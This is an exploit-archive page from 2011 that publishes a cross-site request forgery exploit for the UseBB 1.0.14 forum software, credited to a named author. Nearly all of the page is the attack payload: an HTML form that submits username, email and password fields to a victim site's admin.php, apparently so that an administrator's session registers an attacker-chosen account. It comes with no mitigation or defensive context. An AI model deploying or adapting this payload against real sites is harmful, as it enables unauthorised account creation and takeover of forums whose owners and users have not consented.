Home / exploits UseBB 1.0.14 Cross Site Request Forgery
Posted on 13 December 2011
UseBB 1.0.14 CSRF Vulnerability Author : Muhammet Cagri Tepebasili Date : 11.12.2011 Script & Demo : UseBB http://demo.opensourcecms.com/usebb/index.php Version : 1.0.14 Tested On : Linux Mint 11 Exploit : <label><b>UseBB 1.0.14 CSRF Vulnerability | Author : Muhammet Cagri Tepebasili</b></label><br> <label> Note : Your Password must be min 8 charecter.</label><br> <cagritepebasili> <form action="[Victim]/admin.php" method="post"> <table id="adminregulartable"> <tr><td class="fieldtitle">Username <small>*</small></td><td> <input type="text" size="30" name="name" id="name" maxlength="255" value="" /><div class="moreinfo"> </div></td></tr> <tr><td class="fieldtitle">Email <small>*</small></td><td>< input type="text" size="30" name="email" maxlength="255" value=""/></td></tr> <tr><td class="fieldtitle">Password <small>*</small></td><td><input type="password" size="30" name="passwd1" maxlength="255" /><div class="moreinfo"></div></td></tr> <tr><td class="fieldtitle"> <small>*</small></td><td><input type="password" size="30" name="passwd2" maxlength="255" /></td></tr> <tr><td colspan="2" class="submit"><input type="submit" value="Register" /><input type="reset" value="Reset" /></td></tr></table></form> </cagritepebasili> Greetz : Eymen Sen , Cafer K.Sezer, Hulusi Baybal and Baris Turan
